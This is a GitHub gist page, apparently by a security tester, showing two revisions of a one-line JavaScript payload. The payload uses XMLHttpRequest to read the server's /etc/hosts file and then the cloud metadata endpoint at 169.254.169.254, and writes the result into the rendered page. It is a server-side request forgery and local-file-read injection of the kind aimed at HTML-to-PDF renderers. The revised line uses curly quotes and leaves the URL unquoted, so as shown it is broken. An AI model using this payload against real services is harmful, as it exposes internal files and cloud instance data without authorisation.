Skip to content

Instantly share code, notes, and snippets.

@rv0x00
Last active July 24, 2022 13:30
Show Gist options
  • Select an option

  • Save rv0x00/b6fc7e724461b0c9cf06f31f68b62b8d to your computer and use it in GitHub Desktop.

Select an option

Save rv0x00/b6fc7e724461b0c9cf06f31f68b62b8d to your computer and use it in GitHub Desktop.

Revisions

  1. rv0x00 revised this gist Jul 24, 2022. 1 changed file with 1 addition and 1 deletion.
    2 changes: 1 addition & 1 deletion script.js
    Original file line number Diff line number Diff line change
    @@ -1 +1 @@
    x=new XMLHttpRequest;x.onload=function(){document.write(this.responseText)};x.open(‘GET’,file:///etc/hosts);x.send();
    x=new XMLHttpRequest;x.onload=function(){document.write(this.responseText)};x.open(‘GET’,http://169.254.169.254/latest/meta-data/hostname);x.send();
  2. rv0x00 created this gist Jul 24, 2022.
    1 change: 1 addition & 0 deletions script.js
    Original file line number Diff line number Diff line change
    @@ -0,0 +1 @@
    x=new XMLHttpRequest;x.onload=function(){document.write(this.responseText)};x.open(‘GET’,’file:///etc/hosts’);x.send();